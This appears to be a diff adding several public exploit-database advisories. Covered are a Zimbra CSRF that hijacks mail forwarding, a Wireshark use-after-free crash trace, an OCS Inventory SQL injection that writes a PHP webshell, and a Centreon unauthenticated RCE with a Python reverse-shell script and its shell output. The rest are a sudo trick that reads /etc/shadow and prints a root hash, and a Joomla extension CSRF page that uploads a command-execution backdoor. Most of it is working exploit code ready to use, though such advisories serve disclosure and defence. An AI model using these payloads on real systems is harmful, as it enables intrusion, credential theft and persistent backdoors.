xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="ZimbraWebClient - FF38
(Win)" version="8.0.9_GA_6191"/><session xmlns="" id="19"/><account
xmlns="" by="name">anto@mail.ubuntu.fr</account><format xmlns=""
type="js"/></context></soap:Header><soap:Body><BatchRequest
xmlns="urn:zimbra" onerror="stop"><ModifyPrefsRequest
xmlns="urn:zimbraAccount" requestId="0"><pref xmlns=""
name="zimbraPrefMailForwardingAddress">itworks@ubuntu.fr</pref></ModifyPrefsRequest><a
xmlns="" n'
value='"sn">itworks</a></BatchRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Solution
========
Sensitive forms should be protected by a CSRF token.
Fixes
=====
Fixed with 8.5 release : bug 83547
(https://wiki.zimbra.com/wiki/Security/Collab/86#Notes_from_8.5)
Affected versions
=================
* Zimbra <= 8.0.9 GA Release
Credits
=======
* Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail
-dot- fr)
* Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)

105
platforms/multiple/dos/39503.txt Executable file
View file

@ -0,0 +1,105 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=651
The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==14146==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a0 at pc 0x000000b2c8eb bp 0x7ffdfc45fa70 sp 0x7ffdfc45fa68
READ of size 1 at 0x6070000003a0 thread T0
#0 0xb2c8ea in print_hex_data_buffer wireshark/epan/print.c:987:13
#1 0xb2bf43 in print_hex_data wireshark/epan/print.c:904:14
#2 0x5422e2 in print_packet wireshark/tshark.c:4155:10
#3 0x53cb2e in process_packet wireshark/tshark.c:3742:7
#4 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#5 0x52c1df in main wireshark/tshark.c:2197:13
0x6070000003a0 is located 0 bytes inside of 65-byte region [0x6070000003a0,0x6070000003e1)
freed by thread T0 here:
#0 0x4d6ce0 in free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30
#1 0xc1fd8e in real_free wireshark/epan/tvbuff_real.c:47:3
#2 0xc2229c in tvb_free_internal wireshark/epan/tvbuff.c:110:3
#3 0xc22049 in tvb_free_chain wireshark/epan/tvbuff.c:135:3
#4 0xc21ed1 in tvb_free wireshark/epan/tvbuff.c:125:2
#5 0xbc972e in free_all_fragments wireshark/epan/reassemble.c:351:4
#6 0xbd40e5 in fragment_add_seq_common wireshark/epan/reassemble.c:1919:5
#7 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12
#8 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9
#9 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28
#10 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#12 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#14 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#15 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#16 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#17 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#18 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#19 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#20 0x53c91b in process_packet wireshark/tshark.c:3728:5
#21 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#22 0x52c1df in main wireshark/tshark.c:2197:13
previously allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7ff6062f0610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0xbe1202 in fragment_add_seq_work wireshark/epan/reassemble.c:1793:2
#3 0xbd4181 in fragment_add_seq_common wireshark/epan/reassemble.c:1925:6
#4 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12
#5 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9
#6 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28
#7 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#9 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#10 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#11 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#13 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#14 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#15 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#16 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#17 0x53c91b in process_packet wireshark/tshark.c:3728:5
#18 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#19 0x52c1df in main wireshark/tshark.c:2197:13
SUMMARY: AddressSanitizer: heap-use-after-free wireshark/epan/print.c:987:13 in print_hex_data_buffer
Shadow bytes around the buggy address:
0x0c0e7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8040: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
0x0c0e7fff8050: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd
=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa
0x0c0e7fff8080: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa
0x0c0e7fff8090: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fd fd
0x0c0e7fff80a0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
0x0c0e7fff80b0: fd fd fd fd fd fa fa fa fa fa 00 00 00 00 00 00
0x0c0e7fff80c0: 00 00 06 fa fa fa fa fa 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==14146==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11799. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39503.zip

37
platforms/php/webapps/39458.txt Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: OCS Inventory NG <= 2.2 - Search with various criteria SQL Injection and Code execution
# Date: 17-02-2016
# Exploit Author: Ephreet
# Software Link: http://www.ocsinventory-ng.org/en/download/
# Version: <=2.2
# Category: webapps
# Tested on: Debian 3.2.73-2+deb7u2 (MySQL 5.5.47-0+deb7u1, Apache/2.2.22), CentOS 6/7
1. Description
Custom search allows for SQL Injection, while default configuration allows for file write as MySQL user.
Search field fails to escape MySQL special characters, allowing file creation and code execution.
If permissions are not carefully set, one could write to web/crontab folders.
Infrustructure note: this was tested on a single machine, but still applies to multiple servers environments, affecting the DB host.
2. Proof of Concept
At least a low priv user must be logged and access the search function on http://<server>/ocsreports/index.php?function=visu_search
- Time-based SQL Injection
Choose a parameter, use EXACTLY operator:
')) union select sleep(5); #
- Code execution
Bypass input escape and write to filesystem (webshell PoC):
')) union select CONCAT(char(60),char(63),'php echo exec($_GET[',char(39),'cmd',char(39),']);',char(63),char(62)) into outfile '/usr/share/ocsinventory-reports/ocsreports/plugins/main_sections/conf/shell.php'; #
3. Solution
Run MySQL/Apache services as restricted user.
Restrict file write permissions to ocs DB user.
Watch out for weak permissions on /usr/share/ocsinventory-reports/ocsreports/plugins/main_sections/conf/ (it is often set to full write by inexperienced admins).

32
platforms/php/webapps/39498.txt Executable file
View file

@ -0,0 +1,32 @@
========
Ocim MP3 Plugin SQL Injection Vulnerability
========
:----------------------------------------------------------------------------------------------------:
: # Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability
: # Date : 26 February 2016
: # Author : xevil and Blankon33
: # Vendor Site: http://www.ocimscripts.com/
: # Version:
: # Vulnerability : SQL Injection
: # Tested on : Wordpress 4.4.2
: # Severity : High
:----------------------------------------------------------------------------------------------------:
Summary
========
Ocim MP3 is Plugin to make MP3 Grabber site based on Wordpress.
Proof of Concept
========
Infected URL:
http://[Site]/[Path]/wp-content/plugins/ocim-mp3/source/pages.php?id=['SQLi]
Admin Panel:
http://[Site]/[Path]/oc-login.php
===========
Thanks to
===========
All Indonesian Hacker!!!

179
platforms/php/webapps/39501.txt Executable file
View file

@ -0,0 +1,179 @@
Unauthenticated Remote Command Execution in Centreon Web Interface
==================================================================
Description
===========
Centreon is a popular monitoring solution.
A critical vulnerability has been found in the Centreon logging class
allowing remote users to execute arbitrary commands.
SQL injection leading to RCE
============================
Centreon logs SQL database errors in a log file using the "echo" system
command and the exec() PHP function. On the authentification class,
Centreon use htmlentities with the ENT_QUOTES options to filter SQL
entities.
However, Centreon doesn't filter the SQL escape character "\" and it is
possible to generate an SQL Error.
Because of the use of the "echo" system command with the PHP exec()
function, and because of the lack of sanitization, it is possible to
inject arbitrary system commands.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-78
----------------
Proof of Concept
----------------
TCP Reverse Shell using python.
#!/usr/bin/env python
import requests
import argparse
def shell(target, reverseip, reverseport):
payload = 'import socket as a,subprocess as b,os as
c;s=a.socket(2,1);s.connect(("%s",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call(["sh"]);'
% (reverseip,reverseport)
print "[~] Starting reverseshell : %s - port : %d" % (reverseip,
reverseport)
req = requests.post(target, data={"useralias": "$(echo %s |
base64 -d | python)\\" % payload.encode("base64").replace("\n",""),
"password": "foo"})
print "[+] DEAD !"
if __name__ == "__main__":
print "[~] Centreon Unauthentificated RCE - Nicolas Chatelain
<n.chatelain@sysdream.com>"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True)
parser.add_argument("--reverseip", required=True)
parser.add_argument("--reverseport", required=True, type=int)
args = parser.parse_args()
shell(args.target, args.reverseip, args.reverseport)
Shell :
nightlydev@nworkstation ~/Lab/Centreon $ python reverseshell.py
--target=http://172.16.138.137/centreon/index.php
--reverseip=172.16.138.1 --reverseport 8888
[~] Centreon Unauthentificated RCE - Nicolas Chatelain
<n.chatelain@sysdream.com>
[~] Starting reverseshell : 172.16.138.1 - port : 8888
# Other term
nightlydev@nworkstation ~/Lab/Centreon $ nc -lvp 8888
Ncat: Version 6.45 ( http://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 172.16.138.135.
Ncat: Connection from 172.16.138.135:50050.
whoami
apache
groups
apache centreon-engine centreon-broker centreon nagios
---------------
Vulnerable code
---------------
The vulnerable code is located in class/centreonLog.class.php, line 82
and line 154:
/*
* print Error in log file.
*/
exec("echo \"".$string."\" >> ".$this->errorType[$id]);
In class/centreonAuth.class.php, line 227:
$DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE
`contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "'
AND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1");
--------
Solution
--------
Update to the Centreon 2.5.4
Possible root password disclosure in centengine (Centreon Entreprise Server)
============================================================================
In some configurations, when centengine can run as root (with sudo).
It's possible to read some file content.
**Access Vector**: local
**Security Risk**: high
**Vulnerability**: CWE-209
----------------
Proof of Concept
----------------
$ sudo /usr/sbin/centengine -v /etc/shadow
[1416391088] reading main config file
[1416391088] error while processing a config file: [/etc/shadow:1]
bad variable name:
'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'
[1416391088]
---------------
Vulnerable code
---------------
In Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon
CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *
--------
Solution
--------
Do not allow centengine to be run as root or do not disclose the line
that caused the error.
Timeline (dd/mm/yyyy)
=====================
* 18/11/2014 : Initial discovery
* 26/11/2014 : Contact with Centreon team
* 27/11/2014 : Centreon correct vulnerabilities
* 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities
Fixes
=====
*
https://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9
*
https://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d
*
https://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1
Affected versions
=================
* Centreon <= 2.5.3
Credits
=======
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)

122
platforms/php/webapps/39506.txt Executable file
View file

@ -0,0 +1,122 @@
---------------------------------------------------------
RatioSec Research Security Advisory RS-2016-001
---------------------------------------------------------
JSN PowerAdmin Joomla! Extension Remote Command Execution Via CSRF and
XSS vulnerabilities
---------------------------------------------------------
Product: JSN PowerAdmin Joomla! Extension
Vendor: JoomlaShine.com
Tested Versions: 2.3.0
Other Vulnerable Versions: Prior versions may also be affected
Vendor Notification: 28th January, 2016
Advisory Publication: 24th February, 2016
CVE Reference: Pending
RatioSec Advisory Reference: RS-2016-001
Risk Level: High
CVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
---------------------------------------------------------
RatioSec Research has discovered two cross-site request forgery and
reflected cross-site scripting vulnerabilities in JSN PowerAdmin
Joomla! Extension which can be exploited, respectively, to upload PHP
files and run arbitrary HTML and script code in a user's browser
session in context of the affected web site.
1) The application allows users to perform certain actions via HTTP
requests without performing proper checks to verify the requests
validity. An authenticated user's browser can be forced to upload PHP
files via the extension installer and subsequently execute arbitrary
commands with the web server privileges by tricking the user into
visiting a malicious web site.
2) Input passed to `identified_name` GET parameter when `package` is
set, `option` is set to `com_poweradmin`, `view` is set to
`installer`, and `task` is set to `installer.install` in
`/administrator/index.php` is not properly sanitised before being
reflected. This can be exploited to run arbitrary HTML and script code
in a user's browser session in context of the affected web site.
---------------------------------------------------------
Proof of Concept
Read the advisory details on the RatioSec Research website for the
proof of concept code.
http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/
----------------------------------------------------------
Solution
No official solution is currently available.
----------------------------------------------------------
Timeline
- First contact: 27th January, 2016
- Disclosure: 28th January, 2016. Preliminary date set to 10th, February 2016.
- E-mail notice after no response: 02nd February, 2016
- Advisory Publication: 24th February, 2016
----------------------------------------------------------
Advisory URL
http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/
RatioSec Research
Mail: research at ratiosec dot com
Web: http://www.ratiosec.com/
Twitter: https://twitter.com/ratio_sec
----------------
Proof Of Concept
1) The following HTML page exploits the cross-site request forgery vulnerability and uploads a malicious PHP script system($_GET['cmd']); as /tmp/bd.phtml if visited by a logged-in administrator.
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/no8/joomla/administrator/index.php?option=com_poweradmin&view=installer&task=installer.install", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------167969427914885435381146171168");
xhr.withCredentials = true;
var body = "-----------------------------167969427914885435381146171168\r\n" +
"Content-Disposition: form-data; name=\"package\"; filename=\"bd.phtml\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3cscript language=\"php\"\x3esystem($_GET['cmd']);\r\n" +
"\r\n" +
"-----------------------------167969427914885435381146171168--\r\n" +
"\r\n" +
"\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
The file extension .phtml and the <script language="php"> </script> tags are used here to fool the Joomla API JFile::upload() file validation checks. As result, the backdoor is installed permanently as /tmp/bd.phtml which can be used lately by the attacker to obtain the full system compromise.
Command Execution
2) The following URL exploits the cross-site scripting vulnerability to execute javascript code in a logged-in administrators browser.
http://localhost/joomla/administrator/index.php?package=foobar&option=com_poweradmin&view=installer&task=installer.install&identified_name=<img+src%3dx+onerror=alert("RatioSecResearch")>